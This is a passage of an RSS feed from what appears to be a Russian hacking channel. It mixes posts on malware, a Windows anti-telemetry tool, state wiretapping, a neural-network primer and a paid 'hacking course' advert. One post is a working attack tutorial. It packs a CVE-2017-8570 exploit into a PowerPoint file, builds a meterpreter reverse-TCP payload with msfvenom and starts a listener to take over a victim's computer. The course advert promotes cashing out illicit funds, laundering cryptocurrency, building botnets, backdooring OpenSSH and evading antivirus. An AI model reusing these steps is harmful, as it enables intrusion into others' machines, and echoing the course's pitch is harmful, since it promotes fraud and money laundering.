  <p>Безусловно, наш вирус — не самый страшный на свете, а локер и шифровальщик еще нужно как-то доставлять до машины жертвы. При этом ни одна из наших программ не общается с C&amp;C-сервером и я совсем не обфусцировал код, так что здесь остается еще огромный простор для творчества.</p>
  <p>Тем не менее уровень детекта антивирусами оказался на удивление низким. Получается, что даже самая простая самописная малварь может стать угрозой. Так что антивирусы антивирусами, но скачивать из интернета случайные программы и запускать их не думая всегда будет небезопасно.</p>
  <hr />
  <h3>Все наши проекты можно глянуть здесь-&gt; <a href="https://t.me/h4ckers_zone" target="_blank">https://t.me/h4ckers_zone</a></h3>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@h4ckers_zone/My8RWjikD</guid><link>https://teletype.in/@h4ckers_zone/My8RWjikD?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone</link><comments>https://teletype.in/@h4ckers_zone/My8RWjikD?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone#comments</comments><dc:creator>h4ckers_zone</dc:creator><title>Маскировка вируса под PowerPoint</title><pubDate>Sun, 06 Sep 2020 18:32:30 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/3e/1c/3e1cdb66-42a7-41af-a9ff-2cd095eb80ae.jpeg"></media:content><description><![CDATA[<img src="https://teletype.in/files/3e/1c/3e1cdb66-42a7-41af-a9ff-2cd095eb80ae.jpeg"></img>Данный материал предоставлен лишь в образовательных целях и создан в рамках изучения информационной безопасности. Автор не публиковал материал для вредоносных целей. Если кто-либо воспользуется информацией для личной выгоды, то автор не несёт ответственность за любой причинённый вред или ущерб.]]></description><content:encoded><![CDATA[
  <figure class="m_column">
    <img src="https://teletype.in/files/3e/1c/3e1cdb66-42a7-41af-a9ff-2cd095eb80ae.jpeg" width="1200" />
  </figure>
  <p data-align="center"><strong>Данный материал предоставлен лишь в образовательных целях и создан в рамках изучения информационной безопасности. Автор не публиковал материал для вредоносных целей. Если кто-либо воспользуется информацией для личной выгоды, то автор не несёт ответственность за любой причинённый вред или ущерб.</strong></p>
  <hr />
  <h3><strong>Что нам понадобится:</strong></h3>
  <ol>
    <li><strong>Kali linux</strong></li>
    <li><strong>Metasploit</strong></li>
    <li><strong>Знание базовых команд линукс</strong></li>
  </ol>
  <hr />
  <h3>Начинаем:</h3>
  <p>1) Скачиваем эксплойт с GitHub-&gt;<a href="https://github.com/tezukanice/Office8570" target="_blank">https://github.com/tezukanice/Office8570</a></p>
  <p>2) Переходим в папку эксплойта:</p>
  <pre>cd Office8570</pre>
  <p>3) Создаём папку &quot;template&quot; (Понадобится для успешной генерации ppsx файла)</p>
  <pre>mkdir template</pre>
  <p>4)Переносим файл template.ppsx(он находится в папке, которую мы скачали)</p>
  <pre>cp template.ppsx template/</pre>
  <p>5)Создаём сам сaм .ppsx файл( имя презентации меняется здесь )</p>
  <pre>python cve-2017-8570_toolkit.py -M gen -w Invoke.ppsx -u http://ВашАйпи/logo.doc</pre>
  <p></p>
  <blockquote>Файл презентации мы сделали, нo в него нужно вшить вирус(полезную нагрузку)</blockquote>
  <p></p>
  <p>7)Создадим Payload</p>
  <pre>msfvenom -p windows/meterpreter/reverse_tcp LHOST=ВашАйпи LPORT=4444 -f exe &gt; /tmp/shell.exe</pre>
  <p>8) Запускаем слушатель, который сообщит и получит управление после открытия файла жертвой.</p>
  <pre>msfconsole -x «use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ВашАйпи; set LPORT 4444; run»</pre>
  <p>9)Запускаем сервер</p>
  <pre>python cve-2017-8570_toolkit.py -M exp -e http://ВашАйпи/shell.exe -l /tmp/shell.exe</pre>
  <hr />
  <h3>Принцип работы</h3>
  <p>После открытия презентации жертвой вирус начинает незаметно скачиваться, а затем компьютер автоматически запускает его. После этого в консоли откроется сессия и вы сможете управлять компьютером жертвы.</p>
  <hr />
  <p data-align="center"><strong><a href="https://telegram.me/BTC_CHANGE_BOT?start=c_715698d73d2ee79bdbc3bd06fb6b3809" target="_blank">BTC-Чек</a></strong> <strong><a href="https://telegram.me/BTC_CHANGE_BOT?start=c_715698d73d2ee79bdbc3bd06fb6b3809" target="_blank">BTC-Чек</a></strong> <strong><a href="https://telegram.me/BTC_CHANGE_BOT?start=c_715698d73d2ee79bdbc3bd06fb6b3809" target="_blank">BTC-Чек</a></strong></p>
  <hr />
  <h2 data-align="center"><a href="https://t.me/h4ckers_zone" target="_blank">https://t.me/h4ckers_zone</a></h2>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@h4ckers_zone/OPulISwvo</guid><link>https://teletype.in/@h4ckers_zone/OPulISwvo?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone</link><comments>https://teletype.in/@h4ckers_zone/OPulISwvo?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone#comments</comments><dc:creator>h4ckers_zone</dc:creator><title>Windows Spy Blocker</title><pubDate>Wed, 02 Sep 2020 06:49:31 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/5d/ec/5dec1c7e-0c2c-4a78-af99-6c8b7a5391d2.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/5f/07/5f07b0cb-959a-49b7-aed6-6673154f0b9b.jpeg"></img>В современном цифровом мире достаточно много вопросов «упираются» в проблему отслеживания персональных данных, а также тёмную схему шпионажа за пользовательской деятельностью. В данной статье мы поговорим о том, как можно полноценно защититься от подобных проблем в операционной системе Windows, а также рассмотрим особенности полезного инструмента Windows Spy Blocker.]]></description><content:encoded><![CDATA[
  <figure class="m_column">
    <img src="https://teletype.in/files/5f/07/5f07b0cb-959a-49b7-aed6-6673154f0b9b.jpeg" width="1200" />
  </figure>
  <hr />
  <p>В современном цифровом мире достаточно много вопросов «упираются» в проблему отслеживания персональных данных, а также тёмную схему шпионажа за пользовательской деятельностью. В данной статье мы поговорим о том, как можно полноценно защититься от подобных проблем в операционной системе Windows, а также рассмотрим особенности полезного инструмента Windows Spy Blocker.</p>
  <hr />
  <h3>Windows Spy Blocker </h3>
  <p>Windows Spy Blocker предназначен для блокировки шпионажа и отслеживания. Приложение выполняется с использованием языка программирования Go. Эта программа фиксирует и анализирует сетевой трафик на основе набора определённых инструментов. Она доступна для Windows 7 SP1, Windows 8, Windows 10.</p>
  <p>Ссылка-&gt; <a href="https://github.com/crazy-max/WindowsSpyBlocker/releases/tag/4.16.0" target="_blank">https://github.com/crazy-max/WindowsSpyBlocker/releases/tag/4.16.0</a></p>
  <p>Он поставляется в виде легкого исполняемого файла. Хорошо, что исполняемый файл может быть загружен (опция для всех, кто ненавидит печатать команды загрузки в командной строке). Текущий выпуск составляет всего лишь 5,5 Мб. Утилита захватывает и анализирует сетевой трафик на основе набора инструментов, реализованных в ней.</p>
  <hr />
  <h3>Как работает Windows Spy Blocker</h3>
  <p>В принципе понятно, разработчик написал данный исполняемый файл специально для того, чтобы заблокировать следящие программы, которые выявляются на основе анализа сетевого трафика. Он не русифицирован, да это и не нужно, так как полноценного интерфейса у него нет, и программа, по сути, представляет собой набор определенных правил.</p>
  <p>Консоль появляется сразу после разрешения на запуск. Первое, что нужно сделать, это включить ваше интернет-соединение, если оно ещё не включено. Если так случилось, что интернет-соединение отсутствует, появится ошибка. Команды выложены на консоли с описанием того, что делает каждая, поэтому Вам будет легко разобраться.</p>
  <figure class="m_column">
    <img src="https://i0.wp.com/cryptoworld.su/wp-content/uploads/2018/09/WindowsSpyBlocker-no-internet-connection.png?resize=598%2C302&ssl=1" width="598" />
  </figure>
  <p>В основной части представлены блоки «Telemetry» и «Dev», которые можно запустить, введя соответственно 1 и 2. Эти команды вызывают дополнительные подкоманды.</p>
  <figure class="m_column">
    <img src="https://i0.wp.com/cryptoworld.su/wp-content/uploads/2018/09/Launch-screen-with-main-commands.png?resize=598%2C298&ssl=1" width="598" />
  </figure>
  <p>Если изобразить данную информацию иерархически, то это будет выглядеть примерно так:</p>
  <figure class="m_column">
    <img src="https://i1.wp.com/cryptoworld.su/wp-content/uploads/2018/09/jkD_CmloLnw.jpg?resize=598%2C385&ssl=1" width="598" />
  </figure>
  <p>Полученные результаты изменяются в соответствии с введенной командой. Итак, чтобы захватить и проанализировать сетевой трафик для телеметрии, разработчик использовал виртуальные машины QEMU на платформе Proxmox VE. При этом дампы памяти очищаются ежедневно, происходит сравнение текущих правил добавления или удаления некоторых хостов или правил брандмауэра. Разработчик указывает, что для захвата трафика он использует следующие инструменты: Qemu -net dump, Sysmon, Wireshark, Proxifier. Все события, которые происходят, сохраняются в папке журналов.</p>
  <figure class="m_column">
    <img src="https://i1.wp.com/cryptoworld.su/wp-content/uploads/2018/09/NCSI-test-internet-connection.png?resize=600%2C301&ssl=1" width="600" />
  </figure>
  <p>Папка данных содержит правила блокировки, основанные на доменах или IP-адресах, обнаруженных во время процесса захвата: блокирование телеметрии, обновления ОС, блокирование сторонних приложений.</p>
  <p>Сразу советую создать под Windows Spy Blocker специальную папку, куда первоначально нужно сохранить саму программу, и там же будут сохраняться все конфигурации, журналы и папки, которые утилита в процессе работы будет создавать. Разработчик программы рекомендует скопировать файл hosts, созданный программой, и находящийся в папке Data, и вставить в hosts вашей системы.</p>
  <p>Утилита будет востребована у тех пользователей, которые хотят следить за своим сетевым трафиком.Таким образом, теперь Вы сможете полноценно использовать прекрасный инструмент Windows Spy Blocker с отличным мотивом, помогающим избежать отслеживания и ускорения. Его функционал очень прост в использовании, поэтому в процессе своей добросовестной работы он Вас вряд ли разочарует.</p>
  <hr />
  <h2><a href="https://t.me/h4ckers_zone" target="_blank">https://t.me/h4ckers_zone</a></h2>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@h4ckers_zone/Zk3T78</guid><link>https://teletype.in/@h4ckers_zone/Zk3T78?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone</link><comments>https://teletype.in/@h4ckers_zone/Zk3T78?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone#comments</comments><dc:creator>h4ckers_zone</dc:creator><title>Прослушка в России</title><pubDate>Mon, 31 Aug 2020 00:06:24 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/df/36/df3611b3-e3bf-4998-8e28-ec344a363bb2.jpeg"></media:content><description><![CDATA[<img src="https://teletype.in/files/14/e1/14e145d2-0f02-42a3-b82c-7bfdbda95981.jpeg"></img>«Не по телефону». «Сейчас перезвоню с другого номера». «Давай выйдем на улицу, прогуляемся, тут лучше не говорить».]]></description><content:encoded><![CDATA[
  <figure class="m_column">
    <img src="https://teletype.in/files/14/e1/14e145d2-0f02-42a3-b82c-7bfdbda95981.jpeg" width="1200" />
  </figure>
  <hr />
  <p><em>«Не по телефону». «Сейчас перезвоню с другого номера». «Давай выйдем на улицу, прогуляемся, тут лучше не говорить».</em></p>
  <p>Такие фразы прочно вошли в жизнь российского истеблишмента, а ведь еще несколько лет назад жалующихся на прослушку телефонов и кабинетов принимали за полусумасшедших, вроде тех, кто носит шапочки из фольги и верит в зомбирующие лучи КГБ. <br /><strong>Сегодня все знают:</strong> слушают всех, слушают без оглядки на закон и материалы этих прослушек чаще используют не в суде, а в политических интригах, доносах и провокациях.</p>
  <p>На языке правоохранительных органов прослушка телефонов и контроль интернет-трафика называются аббревиатурой <strong>«СОРМ» </strong>- «Система технических средств для обеспечения функций оперативно-розыскных мероприятий». <br /><br /><strong>СОРМ-1 </strong>– это комплекс мероприятий, направленных на прослушку мобильной связи<br /><strong>СОРМ-2</strong> – комплекс мероприятий, направленных на мобильного интернет-трафика. <br /><br />Сегодня такие методы расследования выходят на первый план, затмевая традиционные криминалистические подходы. Соответственно, подразделения, отвечающие за <strong>СОРМ</strong>, становятся все более влиятельными в составе органов внутренних дел.</p>
  <hr />
  <h3><strong>По закону, прослушка телефонов и контроль интернет-трафика возможны только по решению суда.</strong> </h3>
  <p>Правда, закон позволяет следователям «включать запись» и без такового, если дело срочное и прослушка необходима для предотвращения готовящегося преступления. Примерно по такому же принципу следователям «в виде исключения» разрешают проводить обыски, получая санкцию суда уже постфактум. Как и в случае с обысками, часто правоохранители пользуются этой нормой, чтобы получать бесконтрольный доступ к чужим тайнам.</p>
  <hr />
  <h3><strong>Существуют также способы легализовать незаконную прослушку.</strong> </h3>
  <p>Поместив имя и телефон нужной персоны в длинный перечень подозреваемых по какому-нибудь уголовному делу. Как говорят источники в органах, судьи почти никогда не вникают, каким образом та или иная фамилия связана с уголовным делом, и подписывают разрешения «одним махом». Такие судебные решения носят гриф «секретно», и кто оказался в списках «на прослушку», гражданам не узнать никогда.</p>
  <hr />
  <p><strong>Впрочем, специалисты, занимающиеся прослушкой, говорят:</strong> сегодня все чаще граждан «ставят на запись» и вовсе без каких-либо решений суда. У каждого оператора связи установлена аппаратура, позволяющая силовикам в любое время получать доступ к разговорам любого клиента (к этому операторов обязывает закон). А в региональном управлении ФСБ есть терминал удаленного доступа, с помощью которого можно в несколько кликов начать слушать любого пользователя мобильной связи. <strong>По закону, право вести прослушку имеют несколько специальных служб.</strong> Кроме самой ФСБ, это МВД, ФСКН, ГУФСИН, таможня, ФСО, СВР. Но контроль за самой аппаратурой, обеспечивающей работу <strong>СОРМ-1</strong> и <strong>СОРМ-2</strong>, находится именно у ФСБ. Как объясняют специалисты, чтобы поставить тот или иной номер на прослушку, сотрудникам из полицейского бюро специальных технических мероприятий не обязательно бежать в ФСБ и просить нажать кнопочку: в МВД и других органах, ведущих оперативно-розыскную деятельность, есть собственные терминалы доступа, но они подключены «через ФСБ», то есть главный ключ все равно расположен у чекистов.</p>
  <hr />
  <h3><strong>Как уберечься от прослушки?</strong> </h3>
  <p>Почти никак. Во-первых, бесполезно менять SIM-карты: на прослушку ставят не номер мобильного, а уникальный номер телефонного аппарата (IMEI). Какая бы симка не была установлена в телефоне, он все равно будет «в прямом эфире». Многие представители истеблишмента и бизнесмены носят с собой несколько телефонов, считая, что один «обычный» слушается, а другие – «левые» - нет. Это наивно Если человека поставили на прослушку, сотрудники органов постоянно получают информацию о местонахождении его телефона. Для этого в телефоне не обязательно должен быть установлен модуль GPS, местоположение даже самой простой и дешевой трубки определяется по базовым станциям с точностью до одного метра. И если вы таскаете с собой несколько трубок, по данным геолокации видно, что рядом с вашим «основным» номером всегда есть 2-3 других. Их тоже сразу же ставят на прослушку, поэтому ходить с кучей телефонов совершенно бессмысленно.</p>
  <hr />
  <p><strong>Впрочем, есть небольшой фокус с двумя трубками, который позволяет относительно надежно сохранить тайну переговоров.</strong> <br />Допустим, есть два аппарата – A и B. <br />A используется постоянно, и есть основания полагать, что его слушают. <br />B – для конфиденциальных разговоров, зарегистрирован на другое лицо. <br />В этом случае A и B никогда не должны быть включены одновременно и рядом. Если нужно сделать звонок по «секретному» телефону B, вы выключаете A, отъезжаете подальше, в зону действия другой базовой станции, потом включаете B, делаете звонок. Потом выключаете B, снова едете к другой базовой станции и уже тогда включаете A.<br />Другой способ – постоянно хранить «секретный» телефон в каком-нибудь скрытом месте, всякий раз приезжая к нему с выключенным «основным» мобильником.</p>
  <hr />
  <p><strong>Особо осторожные жертвы прослушек предпочитают выключать телефон во время важного разговора или прятать его куда подальше.</strong> <br />Возможность записи через телефон в режиме ожидания существует, но такая технология применяется нечасто. В этих случаях используется т.н. микрофонный эффект. Такое можно сделать, только если в непосредственной близости от собеседников работает команда специалистов. Приемник сигнала и средство записи должны находиться где-то недалеко</p>
  <p>С анализом интернет-трафика подозрительных граждан (<strong>СОРМ-2</strong>) у силовиков дела обстоят пока несколько хуже, чем с прослушкой разговоров. Хотя операторы связи точно так же предоставляют спецслужбам любую информацию, сам анализ этих данных довольно сложен. Любой смартфон постоянно скачивает и отправляет огромное количество данных. До последнего времени существовала огромная проблема в том, чтобы вычленить из всей этой массы интересующую информацию, например переписку в Skype. Однако теперь эта задача в целом решена и даже в регионах научились читать интернет-мессенджеры</p>
  <p>Может быть, силовикам бы и хотелось <strong>«слушать всех»</strong>, но в реальности под постоянным наблюдением всего 200-300 человек на миллион. Большинство из них – подозреваемые в экстремизме (в первую очередь исламистского толка) и терроризме, члены находящихся в разработке ОПГ, участники непрозрачных финансовых операций крупного масштаба («обналичники» и т.п.). Лишь не более 10% от всей массы «поднадзорных» слушают по политическому заказу. </p>
  <hr />
  <h3><strong>В последнее время появился еще один проверенный способ стать жертвой прослушки</strong></h3>
  <p>Регулярно критиковать действующую власть или ходить на демонстрации протеста. Конечно, всех участников уличных акций прослушивать не будут, но самых активных – вполне.</p>
  <hr />
  <p>В последнее время все более значимую роль в структуре <strong>СОРМ</strong> играет анализ информации, собранной в социальных сетях. Спецслужбы имеют доступ ко всей переписке, ведущейся в российских социальных сетях. C Facebook дело обстоит сложнее, но и тут тайна общения не гарантирована. Относительно безопасный способ общения – через западные почтовые сервисы - например, Gmail или мессенджеры - например telegram.</p>
  <hr />
  <p><strong>Перлюстрация электронной переписки, мониторинг телефонных переговоров зашли уже так далеко, как и не снилось авторам романов-антиутопий. <br /></strong>Наверное, нередко мощь <strong>СОРМ</strong>ов помогает предотвратить подлинные теракты или настоящие преступления, но для общества куда заметнее случаи, когда методы электронной разведки используются для политического преследования и не имеют никакого отношения к законным процедурам.</p>
  <hr />
  <h2><a href="https://t.me/h4ckers_zone" target="_blank">https://t.me/h4ckers_zone</a></h2>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@h4ckers_zone/ObGcurX7b</guid><link>https://teletype.in/@h4ckers_zone/ObGcurX7b?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone</link><comments>https://teletype.in/@h4ckers_zone/ObGcurX7b?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone#comments</comments><dc:creator>h4ckers_zone</dc:creator><title>Курс по хакингу [PLASTIK 2]</title><pubDate>Tue, 25 Aug 2020 14:26:09 GMT</pubDate><description><![CDATA[После обучения ты научишься не оставлять ни следа от своей деятельности в интернете и поймёшь как зарабатывать реально большие котлеты]]></description><content:encoded><![CDATA[
  <p>После обучения ты научишься не оставлять ни следа от своей деятельности в интернете и поймёшь как зарабатывать реально большие котлеты</p>
  <h3>Рыночная цена: 70 тысяч рублей<br />Цена в @sshop_robot: 299 рублей</h3>
  <hr />
  <h2>Изучив курс, ты научишься:</h2>
  <h3><strong>Безопасность:</strong></h3>
  <ul>
    <li>Настраивать анонимную и безопасную систему</li>
    <li>Обналичивать грязные и серые денежные поступления</li>
    <li>Обходить банковские проверки</li>
    <li>Скрывать подмену fingerprint и IP</li>
    <li>Настраивать безопасность системы виртуализации</li>
    <li>Шифровать трафик и защищаться от перехвата</li>
    <li>Перехватывать трафик в TOR</li>
    <li>Владение нашими персональными софтами</li>
    <li>Обрести знания по векторам атак и мерами их предотвращения</li>
    <li>Создавать изолированную сеть без любых утечек трафика<br />и многое другое</li>
  </ul>
  <h3><strong>Хакинг:</strong></h3>
  <ul>
    <li>Искать уязвимости методом фаззиннга</li>
    <li>Вытягивать Базы Данных и монетизировать данные</li>
    <li>Владеть Linux</li>
    <li>Массовый сбор серверов</li>
    <li>Лить шеллы эксплуатируя Remote File Include</li>
    <li>Получать доступы к серверам</li>
    <li>Автоматизировать работу</li>
    <li>Поднимать свой DNS и лить на него трафик</li>
    <li>Поймешь, что данные - самое дорогое в мире и будешь их монетизировать</li>
    <li>Работать по трафику</li>
  </ul>
  <h3><strong>Вирусология:</strong></h3>
  <ul>
    <li>Настраивать и использовать вирусы</li>
    <li>Превращать загрузки в деньги</li>
    <li>Разбираться в вирусах</li>
    <li>Обходить антивирусы</li>
    <li>Создавать и контролировать ботнет</li>
    <li>Управлять машиной после заражения</li>
    <li>Зачищать следы после атаки</li>
  </ul>
  <h3><strong>Соц. инженерия:</strong></h3>
  <ul>
    <li>Находить подходы к людям</li>
    <li>Понимать паттерны поведения</li>
    <li>Входить в доверие</li>
    <li>Манипулировать поведением</li>
    <li>Зарабатывать на хайпах</li>
    <li>Составлять планы атаки</li>
    <li>Избегать основных ошибки</li>
  </ul>
  <h2>Для кого этот курс:</h2>
  <ol>
    <li>Тебя манит на темную сторону, но ты не знаешь с чего начать</li>
    <li>Ты хочешь класть крупные котлеты в свой карман используя свой мозг</li>
    <li>Ты хочешь овладеть самыми прибыльными направлениями</li>
    <li>Ты не хомячок верящий в светлое будущее работая на дядю</li>
    <li>Ты хочешь перестать смотреть на цены в меню Мишленовского ресторана</li>
    <li>Ты понимаешь, что реально большой куш зарабатывается интеллектом</li>
    <li>Тебя тошнит от слов &quot;кредит&quot; и &quot;ипотека&quot; и поставил цель купить все желаемое за реальный кэш</li>
    <li>Ты прочитал все эти пункты и готов ебашить</li>
  </ol>
  <h2>Содержание курса:</h2>
  <h3><strong>Security / Безопасность</strong></h3>
  <ul>
    <li>Настройка полностью анонимной и безопасной системы</li>
    <li>Обход слежки провайдером</li>
    <li>Шифрование диска на уровне системы</li>
    <li>Создание криптоконтейнеров и безопасное хранение данных вне системы</li>
    <li>Подмена уникальных параметров системы и браузера для обхода fingerprint</li>
    <li>Шифрование трафика и запутывание его источника</li>
    <li>Ввод и вывод валюты в даркнете</li>
    <li>Отбеливание криптовалюты</li>
    <li>Противодействие утечке реальных данных</li>
    <li>Поддержание сессии для обхода банковских проверок</li>
    <li>Настройка анонимных виртуальных машин</li>
    <li>Защита от проникновения в основную систему</li>
    <li>Перехват трафика в системе и на сервере</li>
    <li>Защита от атак нулевого дня</li>
    <li>Связки для безопасного и анонимного доступа в интернет</li>
    <li>Double VPN и его работа в связке с тором</li>
    <li>Защита от падения VPN и утечек из-за сетевых сбоев</li>
    <li>Работа через удалённую систему windows</li>
    <li>Софт для конфигурации и очистки системы</li>
    <li>Отключение подозрительных функций в windows</li>
    <li>Обход утечек через мета-информацию у файлов</li>
    <li>Защита от DNS leak</li>
    <li>Противодействие вычислению через анализ логов</li>
    <li>Использование левых карт и симок</li>
    <li>Схемы отмывания и обналичивания валюты</li>
  </ul>
  <h3><strong>Hacking / Хакинг</strong></h3>
  <ul>
    <li>Основы Linux</li>
    <li>Основы web</li>
    <li>Поиск уязвимостей методом фаззинга</li>
    <li>Вытягивание БД через эксплуатацию SQL-injection</li>
    <li>Пробиваемся на сервак или эксплуатация Local File Include</li>
    <li>Льем шеллы через эксплуатацию Remote File Include</li>
    <li>Что такое Remote Code Execution и с чем его едят</li>
    <li>Изучение инструментария или &quot;секрет моего успеха - автоматизация&quot;</li>
    <li>&quot;Из грязи в князи&quot; поднимаем привелегии на серваке используя эксплоиты для Privilege Escalation</li>
    <li>Обходим фильтрацию форм загрузки файлов для прогрузки веб шеллов</li>
    <li>Брутим SSH и скрываем свое присутствие</li>
    <li>Увеличиваем срок жизни SSH доступов или что такое SSH ключи</li>
    <li>Секреты вечной жизни. Бекдорим OpenSSH на Linux серверах</li>
    <li>Массовый сбор серверов</li>
    <li>Поднимаем свой DNS и льем на него трафик</li>
    <li>Работа по трафику</li>
    <li>Эксплуатация уязвимостей и методы атаки</li>
    <li>Монетизация всех типов данных</li>
  </ul>
  <h3><strong>Malware / Вирусология</strong></h3>
  <ul>
    <li>Приватный вирус университета для лёгкого старта</li>
    <li>Настройка и использование вирyсов</li>
    <li>Работа с популярными фреймворками</li>
    <li>Создание и контроль ботнета</li>
    <li>Создание своего первого ботнета</li>
    <li>Первичная оценка системы</li>
    <li>Анализ большого потока данных</li>
    <li>Обход антивирусов</li>
    <li>Автоматизация атак при массовом распространении</li>
    <li>Безопасное подключение к заражённой машине</li>
    <li>Использование сторонних инструментов</li>
    <li>Как не потерять ботнет после блокировки серверa</li>
    <li>Заметание следов после отработки жертвы</li>
  </ul>
  <h3><strong>Social / Социальная Инженерия</strong></h3>
  <ul>
    <li>СИ для распространения вирусов</li>
    <li>Паттерны поведения</li>
    <li>Ошибки и правильная стратегия в общении</li>
    <li>Создание убедительных аргументов</li>
    <li>Выбор тем и направлений работы</li>
    <li>Креативный подход</li>
    <li>Работа по хайп-направлениям</li>
    <li>Сбор информации для действий</li>
    <li>Разбор типичных ошибок</li>
    <li>Использование интересов для привлечения внимания</li>
    <li>Поиск предлогов для внедрения</li>
    <li>Заметание следов после отработки</li>
  </ul>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@h4ckers_zone/b6lHY6k2</guid><link>https://teletype.in/@h4ckers_zone/b6lHY6k2?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone</link><comments>https://teletype.in/@h4ckers_zone/b6lHY6k2?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone#comments</comments><dc:creator>h4ckers_zone</dc:creator><title>Создаём простую нейросеть</title><pubDate>Tue, 18 Aug 2020 06:03:25 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/6b/8c/6b8c855b-5d43-4314-989c-6770a65cb358.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/b9/51/b951224f-aa07-4d7c-9b2e-d93be8e8312c.jpeg"></img>Чем мы займёмся? Мы пoпрoбуем сoздать прoстую и сoвсем маленькую нейрoсеть, кoтoрую мы научим что-либо различать. При этoм не будем вдаваться в истoрию и математические дебри (такую информацию найти oчень легкo) — вместo этого пoстараемся oбъяснить задачу (не факт, что удастся) вам и самим себе рисунками и кодом.]]></description><content:encoded><![CDATA[
  <figure class="m_column">
    <img src="https://teletype.in/files/b9/51/b951224f-aa07-4d7c-9b2e-d93be8e8312c.jpeg" width="1200" />
  </figure>
  <p>Чем мы займёмся? Мы пoпрoбуем сoздать прoстую и сoвсем маленькую нейрoсеть, кoтoрую мы научим что-либо различать. При этoм не будем вдаваться в истoрию и математические дебри (такую информацию найти oчень легкo) — вместo этого пoстараемся oбъяснить задачу (не факт, что удастся) вам и самим себе рисунками и кодом.</p>
  <hr />
  <p>Многие из терминов в нейронных сетях связаны с биологией, поэтому давайте начнём с самого начала:</p>
  <figure class="m_column">
    <img src="https://sun1-84.userapi.com/c851424/v851424801/d476e/L-MLwlD4WxM.jpg" width="807" />
  </figure>
  <p>Мозг — штука сложная, но и его можно разделить на несколько основных частей и операций:</p>
  <figure class="m_column">
    <img src="https://sun1-15.userapi.com/c851424/v851424801/d4776/wMHcyR15nz0.jpg" width="807" />
  </figure>
  <p>Возбудитель может быть и <strong>внутренним </strong>(например, образ или идея):</p>
  <figure class="m_column">
    <img src="https://sun1-27.userapi.com/c851424/v851424801/d477e/xYeOSI2hsCQ.jpg" width="807" />
  </figure>
  <p>А теперь взглянем на основные и упрощенные части мозга:</p>
  <figure class="m_column">
    <img src="https://sun1-29.userapi.com/c851424/v851424801/d4786/3gleWbqb9g0.jpg" width="807" />
  </figure>
  <p><em>Мозг вообще похож на кабельную сеть.</em></p>
  <p><strong>Нейрон </strong>— основная единица исчислений в мозге, он получает и обрабатывает химические сигналы других нейронов, и, в зависимости от ряда факторов, либо не делает ничего, либо генерирует электрический импульс, или Потенциал Действия, который затем через синапсы подает сигналы соседним <strong>связанным </strong>нейронам:</p>
  <figure class="m_column">
    <img src="https://sun1-27.userapi.com/c851424/v851424801/d478e/C84A1aaZ-9U.jpg" width="807" />
  </figure>
  <p>Сны, воспоминания, саморегулируемые движения, рефлексы да и вообще все, что вы думаете или делаете — все происходит благодаря этому процессу: миллионы, или даже миллиарды нейронов работают на разных уровнях и создают связи, которые создают различные параллельные подсистемы и представляют собой биологическую нейронную <strong>сеть</strong>.</p>
  <p>Разумеется, это всё упрощения и обобщения, но благодаря им мы можем описать простую нейронную сеть:</p>
  <figure class="m_column">
    <img src="https://sun1-92.userapi.com/c851424/v851424801/d4796/m6F8WpbLpD4.jpg" width="807" />
  </figure>
  <p>И описать её формализовано с помощью графа:</p>
  <figure class="m_column">
    <img src="https://sun1-30.userapi.com/c851424/v851424801/d479e/dfz4280YBQE.jpg" width="664" />
  </figure>
  <p>Тут требуются некоторые пояснения. Кружки — это нейроны, а линии — это связи между ними, и, чтобы не усложнять на этом этапе, <strong>взаимосвязи </strong>представляют собой прямое передвижение информации <strong>слева направо</strong>. Первый нейрон в данный момент активен и выделен серым. Также мы присвоили ему число (1 — если он работает, 0 — если нет). Числа между нейронами показывают вес связи.</p>
  <p>Графы выше показывают момент времени сети, для более точного отображения, нужно разделить его на временные отрезки:</p>
  <figure class="m_column">
    <img src="https://sun1-99.userapi.com/c851424/v851424801/d47a6/1qzxQwppzAk.jpg" width="388" />
  </figure>
  <p>Для создания своей нейронной сети нужно понимать, как веса влияют на нейроны и как нейроны обучаются. В качестве примера возьмем кролика (тестового кролика) и поставим его в условия классического эксперимента.</p>
  <figure class="m_column">
    <img src="https://sun1-28.userapi.com/c851424/v851424801/d47ae/CrV8r8h_s2M.jpg" width="807" />
  </figure>
  <p>Когда на них направляют безопасную струю воздуха, кролики, как и люди, моргают:</p>
  <figure class="m_column">
    <img src="https://sun1-85.userapi.com/c851424/v851424801/d47b6/2rKyJsIHXg4.jpg" width="807" />
  </figure>
  <p>Эту модель поведения можно нарисовать графами:</p>
  <figure class="m_column">
    <img src="https://sun1-17.userapi.com/c851424/v851424801/d47be/y7j2xQo0Pzg.jpg" width="807" />
  </figure>
  <p>Как и в предыдущей схеме, эти графы показывают только тот момент, когда кролик чувствует дуновение, и мы таким образом <strong>кодируем </strong>дуновение как логическое значение. Помимо этого мы вычисляем, срабатывает ли второй нейрон, основываясь на значении веса. Если он равен 1, то сенсорный нейрон срабатывает, мы моргаем; если вес меньше 1, мы не моргаем: у второго нейрона <strong>предел </strong>— 1.</p>
  <p>Введем еще один элемент — безопасный звуковой сигнал:</p>
  <figure class="m_column">
    <img src="https://sun1-83.userapi.com/c851424/v851424801/d47ce/iQx38WSvVlQ.jpg" width="807" />
  </figure>
  <p>Мы можем смоделировать заинтересованность кролика так:</p>
